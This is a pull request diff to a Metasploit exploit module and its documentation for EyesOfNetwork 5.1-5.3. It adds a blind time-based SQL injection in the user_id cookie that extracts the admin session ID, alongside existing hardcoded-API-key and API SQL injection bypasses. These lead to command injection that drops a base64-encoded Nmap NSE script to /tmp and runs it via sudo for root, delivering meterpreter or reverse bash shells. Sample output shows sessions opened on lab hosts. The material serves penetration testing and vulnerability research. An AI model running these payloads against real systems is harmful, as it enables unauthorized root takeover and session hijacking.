### PR TITLE
Update eyesofnetwork_autodiscovery_rce with CVE-2020-9465 (extends use to 5.1 & 5.2) and add meterpreter support

### DIFF
--- a/documentation/modules/exploit/linux/http/eyesofnetwork_autodiscovery_rce.md
+++ b/documentation/modules/exploit/linux/http/eyesofnetwork_autodiscovery_rce.md
@@ -62,7 +62,7 @@ Exploit target:
 msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit
 
 [*] Started reverse TCP handler on 192.168.1.2:4444 
-[*] Target is EyesOfNetwork version 5.1 or earlier. Attempting exploitation using CVE-2020-9465.
+[*] Target is EyesOfNetwork version 5.1. Attempting exploitation using CVE-2020-9465.
 [+] The target seems vulnerable.
 [*] Verified that the admin user has at least one active session.
 [*] Found the admin 'session_id' size: 31

--- a/documentation/modules/exploit/linux/http/eyesofnetwork_autodiscovery_rce.md
+++ b/documentation/modules/exploit/linux/http/eyesofnetwork_autodiscovery_rce.md
@@ -1,11 +1,23 @@
 ## Vulnerable Application
-This module exploits multiple vulnerabilities in EyesOfNetwork version 5.1, 5.2 and 5.3 in order to execute arbitrary commands as root.
+This module exploits multiple vulnerabilities in EyesOfNetwork version 5.1, 5.2 and 5.3 in order to execute arbitrary
+commands as root.
 
-The module first runs a few checks to verify the EyesOfNetwork version. If version 5.1 or 5.2 is detected, it attempts an authentication bypass via an SQL injection in the user_id field in a cookie (CVE-2020-9465). If version 5.3 is detected, the module exploits a hardcoded admin API key in EyesOfNetwork API version 2.4.2 (CVE-2020-8657) in order to generate a valid access token and use it to create a new user with admin privileges. If the generated key is not valid, the admin API key is obtained via an SQL injection vulnerability affecting the same API version (CVE-2020-8656). If this doesn't work either, it attempts CVE-2020-9465, which is the slowest and most noisy exploit of the three.
+The module first runs a few checks to verify the EyesOfNetwork version. If version 5.1 or 5.2 is detected, it attempts
+an authentication bypass via an SQL injection in the `user_id` field in a cookie (CVE-2020-9465). If version 5.3 is
+detected, the module exploits a hardcoded admin API key in EyesOfNetwork API version 2.4.2 (CVE-2020-8657) in order to
+generate a valid access token and uses it to create a new user with admin privileges. If the generated key is not valid,
+the admin API key is obtained via an SQL injection vulnerability affecting the same API version (CVE-2020-8656). If this
+doesn't work either, it attempts CVE-2020-9465, which is the slowest and most noisy exploit of the three.
 
-For all vulnerable versions, the next step after bypassing authentication is to abuse a command injection vulnerability in the `target` parameter of the AutoDiscovery functionality within the EON web interface (CVE-2020-8654). Specifically, the module writes an Nmap NSE script containing the payload to disk, and then activates this script by launching an Nmap host discovery scan against the target. This achieves privilege escalation because the default sudo configuration permits the 'apache' user to execute Nmap as root (CVE-2020-8655).
+For all vulnerable versions, the next step after bypassing authentication is to abuse a command injection vulnerability
+in the `target` parameter of the AutoDiscovery functionality within the EON web interface (CVE-2020-8654). Specifically,
+the module writes an Nmap NSE script containing the payload to disk, and then activates this script by launching an Nmap
+host discovery scan against the target. This achieves privilege escalation because the default sudo configuration
+permits the 'apache' user to execute Nmap as root (CVE-2020-8655).
 
-The module only works with HTTPS, so SSL is enabled by default. Valid credentials for a user with administrative privileges are required. However, as explained above, the module can bypass authentication via various methods, depending on the EON version. This module has been successfully tested on EyesOfNetwork 5.1, 5.2 and 5.3.
+The module only works with HTTPS, so SSL is enabled by default. Valid credentials for a user with administrative
+privileges are required. However, as explained above, the module can bypass authentication via various methods,
+depending on the EON version. This module has been successfully tested on EyesOfNetwork 5.1, 5.2 and 5.3.
 
 ## Verification Steps
 1. Install the module as usual
@@ -17,13 +29,18 @@ The module only works with HTTPS, so SSL is enabled by default. Valid credential
 7. Do: `exploit`
 
 ## Options
-1. `SERVER_ADDR`. This option should be set for EON version 5.3 in case the EyesOfNetwork server IP address is different from RHOST. This because the EON server IP is needed to generate the API key.
 
-## Advanced Options
-1. `SQLI_SLEEP`. The sleep value to be used when attempting to exploit CVE-2020-9465, which uses sleep-based SQL injection. The default value is 1.
+### SERVER_ADDR
+This option should be set for EON version 5.3 in case the EyesOfNetwork server IP address is different from `RHOST`.
+This because the EON server IP is needed to generate the API key.
+
+### SQLI_SLEEP
+The sleep value to be used when attempting to exploit CVE-2020-9465, which uses sleep-based SQL injection. The default
+value is 1.
 
 ## Scenarios
 1. EyesOfNetwork version 5.1
+
 ```
 msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > show options
 
@@ -72,7 +89,9 @@ msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit
 [*] Sending stage (3012516 bytes) to 192.168.1.1
 [*] Meterpreter session 1 opened (192.168.91.2:4444 -> 192.168.1.1:55744) at 2020-05-19 08:48:37 -0400
 ```
+
 2. EyesOfNetwork version 5.2
+
 ```
 msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit
 
@@ -87,7 +106,9 @@ msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit
 [*] Sending stage (3012516 bytes) to 192.168.1.3
 [*] Meterpreter session 2 opened (192.168.1.2:4444 -> 192.168.1.3:38070) at 2020-05-19 08:49:46 -0400
 ```
+
 3. EyesOfNetwork version 5.3
+
 ```
 msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit
 
@@ -99,6 +120,7 @@ msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit
 [*] Sending stage (3012516 bytes) to 192.168.1.4
 [*] Meterpreter session 3 opened (192.168.1.2:4444 -> 192.168.1.4:60244) at 2020-05-19 08:50:04 -0400
 ```
+
 ## References
 1. <https://www.exploit-db.com/exploits/48025>
 2. <https://nvd.nist.gov/vuln/detail/CVE-2020-8654>

--- a/documentation/modules/exploit/linux/http/eyesofnetwork_autodiscovery_rce.md
+++ b/documentation/modules/exploit/linux/http/eyesofnetwork_autodiscovery_rce.md
@@ -1,11 +1,11 @@
 ## Vulnerable Application
-This module exploits multiple vulnerabilities in EyesOfNetwork version 5.3 and prior in order to execute arbitrary commands as root.
+This module exploits multiple vulnerabilities in EyesOfNetwork version 5.1, 5.2 and 5.3 in order to execute arbitrary commands as root.
 
-The module first exploits a hardcoded admin API key in EyesOfNetwork API version 2.4.2 (CVE-2020-8657) in order to generate a valid access token and use it to create a new user with admin privileges. If the generated key is not valid, the admin API key is obtained via an SQL injection vulnerability affecting the same API version (CVE-2020-8656).
+The module first runs a few checks to verify the EyesOfNetwork version. If version 5.1 or 5.2 is detected, it attempts an authentication bypass via an SQL injection in the user_id field in a cookie (CVE-2020-9465). If version 5.3 is detected, the module exploits a hardcoded admin API key in EyesOfNetwork API version 2.4.2 (CVE-2020-8657) in order to generate a valid access token and use it to create a new user with admin privileges. If the generated key is not valid, the admin API key is obtained via an SQL injection vulnerability affecting the same API version (CVE-2020-8656). If this doesn't work either, it attempts CVE-2020-9465, which is the slowest and most noisy exploit of the three.
 
-Next, the module authenticates as the newly created user in order to abuse a command injection vulnerability in the `target` parameter of the AutoDiscovery functionality within the EON web interface (CVE-2020-8654). Specifically, it writes an Nmap NSE script containing the payload to disk, and then activates this script by launching an Nmap host discovery scan against the target. This approach achieves privilege escalation because the default sudo configuration permits the 'apache' user to execute Nmap as root (CVE-2020-8655).
+For all vulnerable versions, the next step after bypassing authentication is to abuse a command injection vulnerability in the `target` parameter of the AutoDiscovery functionality within the EON web interface (CVE-2020-8654). Specifically, the module writes an Nmap NSE script containing the payload to disk, and then activates this script by launching an Nmap host discovery scan against the target. This achieves privilege escalation because the default sudo configuration permits the 'apache' user to execute Nmap as root (CVE-2020-8655).
 
-The module only works with HTTPS, so SSL is enabled by default. Valid credentials for a user with administrative privileges are required. However, this module can bypass authentication via two methods, i.e. by generating an API access token based on a hardcoded key, and via SQLI. This module has been successfully tested on EyesOfNetwork 5.3 with API version 2.4.2.
+The module only works with HTTPS, so SSL is enabled by default. Valid credentials for a user with administrative privileges are required. However, as explained above, the module can bypass authentication via various methods, depending on the EON version. This module has been successfully tested on EyesOfNetwork 5.1, 5.2 and 5.3.
 
 ## Verification Steps
 1. Install the module as usual
@@ -17,9 +17,13 @@ The module only works with HTTPS, so SSL is enabled by default. Valid credential
 7. Do: `exploit`
 
 ## Options
-1. `SERVER_ADDR`. This option should be set in case the EyesOfNetwork server IP address is different from RHOST. This because the EON server IP is needed to generate the API key.
+1. `SERVER_ADDR`. This option should be set for EON version 5.3 in case the EyesOfNetwork server IP address is different from RHOST. This because the EON server IP is needed to generate the API key.
+
+## Advanced Options
+1. `SQLI_SLEEP`. The sleep value to be used when attempting to exploit CVE-2020-9465, which uses sleep-based SQL injection. The default value is 1.
 
 ## Scenarios
+1. EyesOfNetwork version 5.1
 ```
 msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > show options
 
@@ -31,12 +35,16 @@ Module options (exploit/linux/http/eyesofnetwork_autodiscovery_rce):
    RHOSTS       192.168.1.1      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
    RPORT        443              yes       The target port (TCP)
    SERVER_ADDR                   yes       EyesOfNetwork server IP address (if different from RHOST)
+   SRVHOST      0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT      8080             yes       The local port to listen on.
    SSL          true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
    TARGETURI    /                yes       Base path to EyesOfNetwork
+   URIPATH                       no        The URI to use for this exploit (default is random)
    VHOST                         no        HTTP server virtual host
 
 
-Payload options (generic/shell_reverse_tcp):
+Payload options (linux/x64/meterpreter/reverse_tcp):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
@@ -48,19 +56,48 @@ Exploit target:
 
    Id  Name
    --  ----
-   0   Auto
+   1   Linux (x64)
 
 
 msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit
 
 [*] Started reverse TCP handler on 192.168.1.2:4444 
-[*] Using generated API key: a496fb1025187066dc1e4e56197bd2db1a23c565f42b98df8ff55698442b6476
-[+] Authenticated as user kY7Qn1gr8L
-[*] Sending payload (428 bytes) ...
-[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.1:45897) at 2020-02-19 15:30:31 +0100
+[*] Target is EyesOfNetwork version 5.1 or earlier. Attempting exploitation using CVE-2020-9465.
+[+] The target seems vulnerable.
+[*] Verified that the admin user has at least one active session.
+[*] Found the admin 'session_id' size: 31
+[*] Calculating the admin 'session_id' value. This will take a while...
+[+] Obtained admin 'session_id' value: 1856115646
+[*] Command Stager progress - 100.00% done (897/897 bytes)
+[*] Sending stage (3012516 bytes) to 192.168.1.1
+[*] Meterpreter session 1 opened (192.168.91.2:4444 -> 192.168.1.1:55744) at 2020-05-19 08:48:37 -0400
+```
+2. EyesOfNetwork version 5.2
+```
+msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit
 
-id
-uid=0(root) gid=0(root) groups=0(root)
+[*] Started reverse TCP handler on 192.168.1.2:4444 
+[*] Target is EyesOfNetwork version 5.2. Attempting exploitation using CVE-2020-9465.
+[+] The target seems vulnerable.
+[*] Verified that the admin user has at least one active session.
+[*] Found the admin 'session_id' size: 31
+[*] Calculating the admin 'session_id' value. This will take a while...
+[+] Obtained admin 'session_id' value: 1445224287
+[*] Command Stager progress - 100.00% done (897/897 bytes)
+[*] Sending stage (3012516 bytes) to 192.168.1.3
+[*] Meterpreter session 2 opened (192.168.1.2:4444 -> 192.168.1.3:38070) at 2020-05-19 08:49:46 -0400
+```
+3. EyesOfNetwork version 5.3
+```
+msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.2:4444 
+[*] Target is EyesOfNetwork version 5.3 or later. Attempting exploitation using CVE-2020-8657 or CVE-2020-8656.
+[*] Using generated API key: a926605f4e617fd68bbb86112156b41ea2406503859dad58b0d0aefcc848b755
+[+] Authenticated as user r6veXwtZ2zh
+[*] Command Stager progress - 100.00% done (897/897 bytes)
+[*] Sending stage (3012516 bytes) to 192.168.1.4
+[*] Meterpreter session 3 opened (192.168.1.2:4444 -> 192.168.1.4:60244) at 2020-05-19 08:50:04 -0400
 ```
 ## References
 1. <https://www.exploit-db.com/exploits/48025>
@@ -68,3 +105,4 @@ uid=0(root) gid=0(root) groups=0(root)
 3. <https://nvd.nist.gov/vuln/detail/CVE-2020-8655>
 4. <https://nvd.nist.gov/vuln/detail/CVE-2020-8656>
 5. <https://nvd.nist.gov/vuln/detail/CVE-2020-8657>
+6. <https://nvd.nist.gov/vuln/detail/CVE-2020-9465>

--- a/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb
+++ b/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb
@@ -6,13 +6,14 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'            => 'EyesOfNetwork AutoDiscovery Target Command Execution',
+      'Name'            => 'EyesOfNetwork 5.1-5.3 AutoDiscovery Target Command Execution',
       'Description'     => %q{
-        This module exploits multiple vulnerabilities in EyesOfNetwork version 5.3
-        and prior in order to execute arbitrary commands as root.
+        This module exploits multiple vulnerabilities in EyesOfNetwork version 5.1, 5.2
+        and 5.3 in order to execute arbitrary commands as root.
 
         This module takes advantage of a command injection vulnerability in the
         `target` parameter of the AutoDiscovery functionality within the EON web
@@ -21,15 +22,15 @@ class MetasploitModule < Msf::Exploit::Remote
         privilege escalation because the`apache` user can execute Nmap as root.
 
         Valid credentials for a user with administrative privileges are required.
-        However, this module can bypass authentication via two methods, i.e. by
-        generating an API access token based on a hardcoded key, and via SQLI.
-        This module has been successfully tested on EyesOfNetwork 5.3 with API
-        version 2.4.2.
+        However, this module can bypass authentication via various methods, depending on
+        the EON version. EON 5.3 is vulnerable to a hardcoded API key and two SQL
+        injection exploits. EON 5.1 and 5.2 can only be exploited via SQL injection.
+        This module has been successfully tested on EyesOfNetwork 5.1, 5.2 and 5.3.
       },
       'License'         => MSF_LICENSE,
       'Author'          =>
         [
-          'Clément Billac', # @h4knet - Discovery and exploit
+          'Clément Billac', # @h4knet - Discovery and exploits
           'bcoles',         # Metasploit
           'Erik Wynter'     # @wyntererik - Metasploit
         ],
@@ -39,24 +40,52 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2020-8655'], # nmap privesc
           ['CVE', '2020-8656'], # sqli auth bypass
           ['CVE', '2020-8657'], # hardcoded API key
-          ['EDB', '48025']
+          ['CVE', '2020-9465'], # sqli in user_id cookie field
+          ['EDB', '48025'], #exploit for EON 5.3 (does not cover CVE 2020-9465)
+          ['url', 'https://github.com/h4knet/eonrce'] #exploits for EON 5.1-5.3 that cover all CVEs mentioned above
         ],
-      'Platform'        => %w[unix linux],
-      'Arch'            => ARCH_CMD,
-      'Targets'         => [['Auto', { }]],
+      'Payload'        => { 'BadChars' => "\x00" },
+      'Targets'        =>
+        [
+          [ 'Linux (x86)', {
+            'Arch' => ARCH_X86,
+            'Platform' => 'linux',
+            'DefaultOptions' => {
+              'PAYLOAD'     => 'linux/x86/meterpreter/reverse_tcp'
+            }
+          } ],
+          [ 'Linux (x64)', {
+            'Arch' => ARCH_X64,
+            'Platform' => 'linux',
+            'DefaultOptions' => {
+              'PAYLOAD'     => 'linux/x64/meterpreter/reverse_tcp'
+            }
+          } ],
+          [ 'Linux (cmd)', {
+            'Arch' => ARCH_CMD,
+            'Platform' => 'unix',
+            'DefaultOptions' => {
+              'PAYLOAD'     => 'cmd/unix/reverse_bash'
+            },
+          } ]
+        ],
+      #'Platform'        => %w[unix linux],
+      #'Arch'            => ARCH_CMD,
+      #'Targets'         => [['Auto', { }]],
       'Privileged'      => true,
       'DisclosureDate'  => '2020-02-06',
       'DefaultOptions'  => {
         'RPORT' => 443,
         'SSL'     => true, #HTTPS is required for the module to work
-        'PAYLOAD' => 'generic/shell_reverse_tcp'
+        #'PAYLOAD' => 'generic/shell_reverse_tcp'
         },
-      'DefaultTarget'   => 0))
+      'DefaultTarget'   => 1))
     register_options [
       OptString.new('TARGETURI', [true, 'Base path to EyesOfNetwork', '/']),
       OptString.new('SERVER_ADDR', [true, 'EyesOfNetwork server IP address (if different from RHOST)', '']),
     ]
     register_advanced_options [
+      OptString.new('SQLI_SLEEP',  [false, 'SQL Sleep value', 1]),
       OptBool.new('ForceExploit',  [false, 'Override check result', false])
     ]
   end
@@ -71,29 +100,149 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     vprint_status("Running check")
-    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, '/eonapi/getApiKey')
+    res = send_request_cgi 'uri' => normalize_uri(target_uri.path,'/login.php')
 
     unless res
       return CheckCode::Unknown('Connection failed')
     end
 
-    unless res.code == 401 && res.body.include?('api_version')
+    unless res.code == 200 && res.body.include?('EyesOfNetwork')
       return CheckCode::Safe('Target is not an EyesOfNetwork application.')
     end
 
-    version = res.get_json_document()['api_version'] rescue ''
+    res_api = send_request_cgi 'uri' => normalize_uri(target_uri.path, '/eonapi/getApiKey')
 
-    if version.to_s.eql? ''
+    unless res_api
+      return CheckCode::Unknown('Connection failed')
+    end
+
+    if res_api.code == 404 #The EON api was only introduced in EON 5.2
+      @version = '5.1'
+      return CheckCode::Appears("Target is EyesOfNetwork version 5.1 or older.")
+    end
+
+    unless res_api.code == 401 && res_api.body.include?('api_version')
+      return CheckCode::Safe('Target is not an EyesOfNetwork application.')
+    end
+
+    api_version = res_api.get_json_document()['api_version'] rescue ''
+
+    if api_version.to_s.eql? ''
       return CheckCode::Detected('Could not determine EyesOfNetwork version.')
     end
 
-    version = Gem::Version.new version
+    api_version = Gem::Version.new api_version
 
-    unless version <= Gem::Version.new('2.4.2')
-      return CheckCode::Safe("Target is EyesOfNetwork with API version #{version}.")
+    unless api_version <= Gem::Version.new('2.4.2')
+      return CheckCode::Safe("Target is EyesOfNetwork with API version #{api_version}.")
     end
 
-    CheckCode::Appears("Target is EyesOfNetwork with API version #{version}.")
+    #The only way to distinguish between EON 5.2 and 5.3 without authenticating is by checking the mod_perl version in the http response headers
+    #The official EON 5.2 VM runs Apache with mod_perl version 2.0.10, while the EON 5.3 VM runs Apache with mod_perl version 2.0.11
+    if res_api.headers.to_s.include?('mod_perl/2.0.10')
+      @version = '5.2'
+      return CheckCode::Appears("Target is EyesOfNetwork 5.2 with API version #{api_version}.")
+    elsif res_api.headers.to_s.include?('mod_perl/2.0.11')
+      @version = '5.3'
+      return CheckCode::Appears("Target is EyesOfNetwork 5.3 with API version #{api_version}.")
+    else
+      return CheckCode::Detected("Could not determine EyesOfNetwork version. API version is #{api_version}")
+    end
+  end
+
+def sqli_to_admin_session
+    sqli_sleep = datastore['SQLI_SLEEP']
+
+    #check if target is vulnerable to CVE-2020-9465
+    start = Time.now
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "/login.php"),
+      'cookie'   => "user_id=' union select sleep(#{sqli_sleep}) -- ;"
+    })
+
+    unless res
+      fail_with Failure::Unreachable, 'Connection failed'
+    end
+
+    elapsed = Time.now - start
+    unless res.code == 200 && elapsed >= 1
+      fail_with Failure::NotVulnerable, 'The target does not seem vulnerable. You could try increasing the value of the advanced option "SQLI_SLEEP".'
+    end
+
+    print_good 'The target seems vulnerable.'
+
+    # Check if the admin user has a session opened, which is required for this exploit to work
+    start = Time.now
+    res1 = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "/login.php"),
+      'cookie'   => "user_id=' union select if((select count(*) from sessions where user_id = 1) > 0, sleep(\"#{sqli_sleep}\"),0) -- ;"
+    })
+    unless res1
+      fail_with Failure::Unreachable, 'Connection failed'
+    end
+
+    elapsed = Time.now - start
+    unless res1.code == 200 && res1.body.include?("<title>EyesOfNetwork</title>") && elapsed >= 1
+      fail_with Failure::NoAccess, 'The admin user has no active sessions.'
+      return
+    end
+
+    print_status 'Verified that the admin user has at least one active session.'
+
+    @session_id_size = 0
+    start = Time.now
+    (23...32).each do |i|
+      res2 = send_request_cgi({
+        'method'   => 'GET',
+        'uri'      => normalize_uri(target_uri.path, "/login.php"),
+        'cookie'   => "user_id=' union select if(length(conv((select session_id from sessions where user_id = 1 limit 1),10,2)) = #{i}, sleep(\"#{sqli_sleep}\"),0) -- ;"
+      })
+
+      unless res2
+        fail_with Failure::Unreachable, 'Connection failed'
+      end
+
+      elapsed = Time.now - start
+      unless res2.code == 200 && res2.body.include?("<title>EyesOfNetwork</title>") && elapsed >= 1
+        next
+      end
+
+      print_status("Found the admin 'session_id' size: #{i}")
+      @session_id_size = i
+      break
+    end
+  end
+
+  def guess_bit(bit)
+    sqli_sleep = datastore['SQLI_SLEEP']
+    start = Time.now
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, "/login.php"),
+      'cookie'   => "user_id=' union select if(mid(conv((select session_id from sessions where user_id = 1 limit 1),10,2),#{bit+1},1), sleep(\"#{sqli_sleep}\"),0) -- ;"
+    })
+    elapsed = Time.now - start
+
+    return 0 unless res
+
+    unless res.code == 200 && res.body.include?("<title>EyesOfNetwork</title>") && elapsed >= 1
+      return 0
+    end
+
+    return 1
+  end
+
+  def get_session_id
+    print_status("Calculating the admin 'session_id' value. This will take a while...")
+    bits = [2] * @session_id_size
+    (0...@session_id_size).each { |i| bits[i] = i }
+    session_bits = []
+    bits.each { |j| session_bits << guess_bit(j) }
+    @session_id = session_bits.join("").to_i(2)
+    print_good("Obtained admin 'session_id' value: #{@session_id}")
+    @cookie = "session_id=#{@session_id}; user_name=admin; user_id=1; group_id=1;"
   end
 
   def generate_api_key
@@ -268,8 +417,19 @@ class MetasploitModule < Msf::Exploit::Remote
     res
   end
 
+  def filter_bad_chars(cmd)
+  cmd.gsub!(/"/, '\"')
+  end
+
   def execute_command(cmd, opts = {})
-    res = create_autodiscovery_job ";#{cmd} #"
+    nse = Rex::Text.encode_base64("local os=require \"os\" hostrule=function(host) os.execute(\"#{cmd}\") end action=function() end")
+    nse_path = "/tmp/.#{rand_text_alphanumeric 8..12}"
+    nse_cmd = "echo #{nse} | base64 -d > #{nse_path};sudo #{nmap_path} localhost -sn -script #{nse_path};rm #{nse_path}"
+    if target.arch.first == ARCH_CMD
+      print_status "Sending payload (#{nse_cmd.length} bytes) ..."
+    end
+
+    res = create_autodiscovery_job ";#{nse_cmd} #"
     return unless res
 
     job_id = res.body.scan(/autodiscovery.php\?id=([\d]+)/).flatten.first
@@ -296,32 +456,57 @@ class MetasploitModule < Msf::Exploit::Remote
       print_warning 'Target does not appear to be vulnerable'
     end
 
-    @api_user = 'admin'
-    @api_key = generate_api_key
-    print_status "Using generated API key: #{@api_key}"
+    if @version != '5.3'
+      if @version == '5.2'
+        print_status "Target is EyesOfNetwork version #{@version}. Attempting exploitation using CVE-2020-9465."
+      else
+        print_status "Target is EyesOfNetwork version #{@version} or earlier. Attempting exploitation using CVE-2020-9465."
+      end
+      sqli_to_admin_session
+      get_session_id
+    else
+      print_status "Target is EyesOfNetwork version #{@version} or later. Attempting exploitation using CVE-2020-8657 or CVE-2020-8656."
+      @api_user = 'admin'
+      @api_key = generate_api_key
+      print_status "Using generated API key: #{@api_key}"
 
-    @username = rand_text_alphanumeric(8..12)
-    @password = rand_text_alphanumeric(8..12)
+      @username = rand_text_alphanumeric(8..12)
+      @password = rand_text_alphanumeric(8..12)
 
-    create_res = create_eon_user @username, @password
-    unless verify_api_key(create_res)
-      @api_key = sqli_to_api_key
-      fail_with Failure::NoAccess, 'Failed to obtain valid API key' unless @api_key
-      print_status("Using API key obtained via SQL injection: #{@api_key}")
-      sqli_verify = create_eon_user @username, @password
-      fail_with Failure::NoAccess, 'Failed to obtain valid API with sqli' unless verify_api_key(sqli_verify)
+      create_res = create_eon_user @username, @password
+
+      api = true #used to check if any of the 2 api exploits work. If not, CVE-2020-9465 is attempted
+      unless verify_api_key(create_res)
+        @api_key = sqli_to_api_key
+        if @api_key
+          print_error("Generated API key does not match.")
+          print_status("Using API key obtained via SQL injection: #{@api_key}")
+          sqli_verify = create_eon_user @username, @password
+          api = false unless verify_api_key(sqli_verify)
+        else
+          api = false
+        end
+      end
+
+      if api
+        admin_group_id = 1
+        login @username, @password
+        unless @cookie.include? 'group_id='
+          @cookie << "; group_id=#{admin_group_id}"
+        end
+      else
+        print_error("Failed to obtain valid API key.")
+        print_status("Attempting exploitation using CVE-2020-9465.")
+        sqli_to_admin_session
+        get_session_id
+      end
     end
 
-    admin_group_id = 1
-    login @username, @password
-    unless @cookie.include? 'group_id='
-      @cookie << "; group_id=#{admin_group_id}"
+    if target.arch.first == ARCH_CMD
+      execute_command payload.encoded.gsub(/"/, '\"')
+    else
+      execute_cmdstager(background: true)
     end
-
-    nse = Rex::Text.encode_base64("local os=require \"os\" hostrule=function(host) os.execute(\"#{payload.encoded.gsub(/"/, '\"')}\") end action=function() end")
-    nse_path = "/tmp/.#{rand_text_alphanumeric 8..12}"
-    cmd = "echo #{nse} | base64 -d > #{nse_path};sudo #{nmap_path} localhost -sn -script #{nse_path};rm #{nse_path}"
-    print_status "Sending payload (#{cmd.length} bytes) ..."
-    execute_command cmd
+    #execute_command cmd
   end
 end

--- a/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb
+++ b/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb
@@ -69,15 +69,11 @@ class MetasploitModule < Msf::Exploit::Remote
             },
           } ]
         ],
-      #'Platform'        => %w[unix linux],
-      #'Arch'            => ARCH_CMD,
-      #'Targets'         => [['Auto', { }]],
       'Privileged'      => true,
       'DisclosureDate'  => '2020-02-06',
       'DefaultOptions'  => {
         'RPORT' => 443,
         'SSL'     => true, #HTTPS is required for the module to work
-        #'PAYLOAD' => 'generic/shell_reverse_tcp'
         },
       'DefaultTarget'   => 1))
     register_options [
@@ -100,14 +96,30 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     vprint_status("Running check")
-    res = send_request_cgi 'uri' => normalize_uri(target_uri.path,'/login.php')
 
-    unless res
+    res_css = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'css/eonweb.css')
+
+    unless res_css
       return CheckCode::Unknown('Connection failed')
     end
 
-    unless res.code == 200 && res.body.include?('EyesOfNetwork')
+    unless res_css.code == 200
       return CheckCode::Safe('Target is not an EyesOfNetwork application.')
+    end
+
+    @version = res_css.body.to_s.split("VERSION :")[1].split(" ")[0]
+
+    if @version.to_s == ''
+      return CheckCode::Detected('Could not determine EyesOfNetwork version.')
+    end
+
+    if @version == '5.1'
+      return CheckCode::Appears("Target is EyesOfNetwork version 5.1.")
+    end
+
+    #The css file for EON 5.2 and 5.3 both mentions version 5.2, so additional checks are needed
+    if @version != '5.2' #The module only works against EON 5.1, 5.2 and 5.3. Other versions are not considered vulnerable.
+      return CheckCode::NotVulnerable("Target is EyesOfNetwork version #{@version} and is not vulnerable.")
     end
 
     res_api = send_request_cgi 'uri' => normalize_uri(target_uri.path, '/eonapi/getApiKey')
@@ -116,18 +128,13 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown('Connection failed')
     end
 
-    if res_api.code == 404 #The EON api was only introduced in EON 5.2
-      @version = '5.1'
-      return CheckCode::Appears("Target is EyesOfNetwork version 5.1 or older.")
-    end
-
     unless res_api.code == 401 && res_api.body.include?('api_version')
       return CheckCode::Safe('Target is not an EyesOfNetwork application.')
     end
 
     api_version = res_api.get_json_document()['api_version'] rescue ''
 
-    if api_version.to_s.eql? ''
+    if api_version.to_s == ''
       return CheckCode::Detected('Could not determine EyesOfNetwork version.')
     end
 
@@ -144,7 +151,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Appears("Target is EyesOfNetwork 5.2 with API version #{api_version}.")
     elsif res_api.headers.to_s.include?('mod_perl/2.0.11')
       @version = '5.3'
-      return CheckCode::Appears("Target is EyesOfNetwork 5.3 with API version #{api_version}.")
+      return CheckCode::Appears("Target is EyesOfNetwork 5.3 or older with API version #{api_version}.")
     else
       return CheckCode::Detected("Could not determine EyesOfNetwork version. API version is #{api_version}")
     end
@@ -457,11 +464,7 @@ def sqli_to_admin_session
     end
 
     if @version != '5.3'
-      if @version == '5.2'
-        print_status "Target is EyesOfNetwork version #{@version}. Attempting exploitation using CVE-2020-9465."
-      else
-        print_status "Target is EyesOfNetwork version #{@version} or earlier. Attempting exploitation using CVE-2020-9465."
-      end
+      print_status "Target is EyesOfNetwork version #{@version}. Attempting exploitation using CVE-2020-9465."
       sqli_to_admin_session
       get_session_id
     else
@@ -507,6 +510,5 @@ def sqli_to_admin_session
     else
       execute_cmdstager(background: true)
     end
-    #execute_command cmd
   end
 end

--- a/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb
+++ b/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb
@@ -75,7 +75,14 @@ class MetasploitModule < Msf::Exploit::Remote
         'RPORT' => 443,
         'SSL'     => true, #HTTPS is required for the module to work
         },
-      'DefaultTarget'   => 1))
+      'DefaultTarget'   => 1,
+      'Notes'          =>
+        {
+          'Stability'   => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],
+          'Reliability' => [ REPEATABLE_SESSION, ],
+        }
+      ))
     register_options [
       OptString.new('TARGETURI', [true, 'Base path to EyesOfNetwork', '/']),
       OptString.new('SERVER_ADDR', [true, 'EyesOfNetwork server IP address (if different from RHOST)', '']),
@@ -216,7 +223,7 @@ def sqli_to_admin_session
         next
       end
 
-      print_status("Found the admin 'session_id' size: #{i}")
+      print_status("Found the admin 'session_id' bit-size: #{i}")
       @session_id_size = i
       break
     end
